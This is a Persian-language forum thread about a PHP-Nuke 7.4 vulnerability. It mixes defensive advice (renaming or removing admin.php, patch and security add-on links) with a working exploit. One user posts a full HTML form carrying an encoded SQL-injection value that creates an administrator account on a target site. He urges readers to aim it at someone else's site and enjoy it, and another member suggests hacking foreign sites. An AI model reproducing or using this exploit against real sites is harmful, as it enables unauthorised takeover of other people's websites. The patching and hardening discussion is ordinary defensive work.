كساني كه nuke7.4 دارند حتما بخونند (خيلي مهم)

[nasser110]

سلام
آقا نمي دونم اطلاع داريد يا نه تو سايت مشهد تيم هم اين موضوع رو گفته و همين طور سايت سيمرغ روس هك سايت هاي با ناك 7.4 رو گفته ، با اين روش هر كسي مي تونه يه يوزر با حق دسترسي مدير ايجاد كنه و كاملا رو ناك شما مديريت كنه ، ظاهرا هنوز پتچ امنيتي اراپه نشده
ولي راه پيش نهادي من براي هك نشدن هيچ ناكي اين است :
فايل Admin.php رو به مثلا Admin128 تغيير بديد و البته بايد اين تغيير رو روي تمام ماژولها اجرا كنيد ، يه كم وقت گيره ولي رد خور نداره
حتما اينكارو بكنيد تا ناكتون هك نشه
مرسي
باي

 

[ara]

آقا با كدوم روش ؟؟
ميشه روشش هم را بگي ؟

 

[mosi-online]

يعني اينكه هرچي admin.php داريم اسمش رو رينيم كنيم به admin128.php آره؟

 

[nasser110]

سلام
اينم روشش : اين كد رو در يه فايل html كپي كنيد :

<html> 

<head> 
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> 
</head> 

<body> 
<form name="mantra" method="POST" action="http://www.yoursite.com/admin.php"> 
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> 
<input type="hidden" name="add_radminsuper" value="1"> 
<input type="hidden" name="op" value="AddAuthor"> 
<p>USERNAME: 
<input type="text" name="add_aid" size="20"> 
<br> 
NOME: 
<input type="text" name="add_name" size="20"> 
<br> 
PASSWORD: 
<input type="text" name="add_pwd" size="20"> 
<br> 
E-MAIL: 
<input type="text" name="add_email" size="20"> 
</p> 
<p> 
<input type="submit" name="Submit" value="Create Admin"> 
<br> 
</p> 
</form> 

</body> 
</html>

به جاي yor site آدرس اون سايت بد بخت رو بديد ، و بريزيد رويه يه هاست و اجراش كنيد و حالشو ببريد
آره فايل admin خودتون رو تغيير نام بديد با ور كنيد ديگه اصلا هك نميشيد
باي

 

[swi]

آقا از كجا بايد بدوني ورژن ناك يك سايت چنده

 

[guilanict]

http://www.nukefixes.com/article97.html

هك را تجربه كنيد اما لطفا سايتهاي خارجي.

 

[nasser110]

سلام
مرسي از معرفي پچ

 

[swi]

كسي جواب منو نميدونه ؟

 

[guilanict]

مرسي از شما كه خبر دادي . من واسه امتحان سايت خودمو هك كردم و كيف كردم.
اين پچ فكر كنم ربطي به اين حفره نداشته باشه.

 

[devilscholar]

چرا ديگه - ربط داره!

اگه دقت كني اول اين روش آدرس admin.php رو ميخواد!!!

اگه تغيير نام بدي ! ديگه نميشه كه!

 

[guilanict]

اما خودمونيما روش خيلي راحت و بيدردسريه ها.
اما اينم بگم ادمين سكيور داشته باشي مشكلي نخواهي داشت.

 

[sarallah]

guilanict جان يه بار از قسمت مديريت logout كن ٬ بعد امتحان كن ببين بازم ميشه

 

[nasser110]

سلام
خواهش مي كنم
آقا كاري به سيستم ادمين سكيور نداره و هر كي ناكش 7.4 باشه و Admin.php رو بر نداره از روي هاستش حتما هك ميشه
فقط هر وقت نياز داشتيد ، admin.php رو آپلود كنيد و يا اينكه تغيير نامش بديد كه البته بايد كامل همه ماژولها رو تغيير نام بديد ، بهترين راه فعلا اينه كه admin.php رو بر داريد .
مرسي

 

[sana159263]

اقا خيلي از سايتها با اين روش هك نميشه فايلها هم سر جاشه

 

[mosi-online]

من كه اول دارم رو سايت خودم تست ميكنمش...

 

[Dark Man]

سايت منو با همين روش هك كردن!حالا بايد چيكار كنم!!؟؟

 

[guilanict]

ثارالله جان
مرسي عزيز
اما منظورم اين نبود كه سايتم هك شده بلكه خودم تست كردم و ديدم حواب مي ده.
من سطح دسترسي رو عوض كرده ام.
باز هم مرسي

 

[guilanict]

dark man عزيز
در اين روش يك مدير ساخته مي شود و شما مي تواني براحتي آن را حذف كني مگر طرف وارد باشه و خودشو تبديل به god كرده باشه. البته اون هم از طريق سي پنل قابل حذف است.

 

[guilanict]

شما مي تونيد فايل authors.php را در بخش ماژولهاي ادمين تغيير نام بديد و فقط مواقعي كه خواستيد مدير كم و زياد كنيد اسمشو برگردونيد. من اينو تست كردم و جواب ميده.

 

[sasan4u]

سلام بجاي تغيير نام يا حذف فايلها راههاي امنيتي رو براي مخفي نگه داشتن مدير ناك از اينجا بخونيد از زبان مدير پروژه ادمين سكيور
http://www.nukecops.com/postt32205.html

در حال ترجمه سيستم حفاظت از ناك جديدي هستم
nuke sentinel
نگهبان ناك كه در نظر سنجي سايت پليس هاي ناك
nukecops.com (نظر سنجي در صفحه اول سايت است سمت راست)
بيشترين راي رو با اختلاف فاحشي نسبت به سيستم هاي حفاظتي ديگه ناك اورده
در اين راي گيري ادمين سكيور در رتبه سومه
نگهبان ناك از امكانات ipban ويرايش جديد بخوبي استفاده مي كنه
و به راحتي رو 7.5 هم قابل نصبه
كار ترجمه تست و نوشتن راهنماي فارسي اون قدر ي وقت گيره و فكر نكنم فرصت بشه در ترجمه ناك كمك كنم احتمالا همزمان با اتمام ناك فارسي جديد كار نگهبان ناك هم تمام مي شه و از اونجايي كه مثل يك ماژول داخليه ناك است مي شه همراه با ناك جديد ارايه كرد
اين مسله از انجا مهمه كه چند سايت ناك 7.3 كه ادمين سكيور روي اونها نصب بوده هكرها تونستن از بيرون مدير ناك ماژولها رو غير فعال كنن شايد يكي از دلايل اينكه در ورژن جديد اكثر ماژولها بخش ادمين دارن همين نقطه ضعف بوده
در اين نظر سنجي آخرين گزينه ديگر روش هاست اين ديگر
روشهاي دستي تغيير ناكه و تبديل اون از يك برنامه همگاني به برنامه اي كه خصوصي مي شه و به راحتي نمي شه هكش كرد اصولا اين 5 سيستم حفاظتي ناك كلاسه شده و تكميل و آسون شده همين روشهاي دستي و از اينجا به وجود اومده و هنوز هم در اين سيستم هاي حفاظتي براي اينكه كار كنن بايد قسمتهايي از فايلهاي اصلي ناك رو تغيير داد

تركيب بهترين سيستم امنيتي ناك و روشهاي دستي ناكي ايجاد مي كنه كاملا امن
و شما وقتي اين تغييرات دستي رو در ناك مي دين بدون نياز به ارتقا اون مي تونيد ماهها بدون ترس از هك شدن به كارهاي سايتتون بپردازيد
الان سايت هاي ناكي مي شناسم كه با ورژن 6.5 البته نه نسخه محمد امين چون محمد در ديتابيس ناك دستكاري كرده بود كار مي كنن و بدليل همين تغييرات دستي سيستم دفاعي اونها بهتر از جديدترين محافظين ناك كار مي كنن
( حضور دوباره محمد در سايت را تبريك مي گم اميدورام موفق باشه)
مشكل ديگه اي كه استفاده كنندگان ناك فارسي دارن اينه بسياري از ناك هاي فارسي موجود در هنگام فارسي سازي ديتابيس ناك رو دستكاري مي كنن
يعني اگه شما از ناك فارسي غير استاندارد با ديتا بيسي كه در هنگام فارسي سازي دستكاري شده بخواهيد تغييرات دستي روي ناك اعمال كنيد و ماهها به اين حالت بمونه و بعد بخواين بعد از يكسال ناك رو به ورژن جديدي كه كس ديگه اي فارسي كرده ارتقا بدين ديتابيس هاي اين ناك هاي فارسي به هم نمي خوره تنها راهش اينه كه از ناك هاي فارسي استفاده كنيد كه توصيه شده و به عنوان ورژن استاندارد معرفي شده

ناك 7.3 ثاراله
ناك 7.4 نارنج دات كام
و ناك 7.5 كه بزودي خواهد امد و به گفته ثاراله در ديتابيس دخل و تصرف نمي شه

همچنين وقتي از ناكهاي استاندارد استفاده كنيد يعني ديتابيس اصلي و دستكاري نشده ناك و همزمان از سيستم امنيتي استفاده مي كنيد از بك آپ هاي ديتابيس كه مي گيريد مي تونيد استفاده كنيد و در مورد ديتابيس هاي دستكاري شده وقتي سيستم حفاظتي رو ناك نصب مي شه از بك آپ ديتابيس نمي شه استفاده كرد

بهترين كمكي كه شما مي تونيد بكنيد اينه كه اين راهي كه madman مدير پروژه ادمين سكيور كه تنبليش گرفته و ادمين سكيور رو ارتقا نمي ده اما اومده راه حل ارايه مي ده
رو براي اين حفره ناك 7.4 امتحان كنيد ببينيد چطوره
يه گشتي هم تو فاروم security بزنيد چيزهاي خوب پيدا كنيد


هر وقت مشكل امنيتي پيدا شد بهترين مرجع تالارگفتگوي سايت پليس هاي ناكه
اصلا يك پروژه تعريف مي كنيم پروژه امنيت ناك و اگه دوست دارين در پروژه امنيت ناك شركت كنيد به سايت پليس هاي ناك سر بزنيد و چيزهاي خوب اونجا پيدا كنيد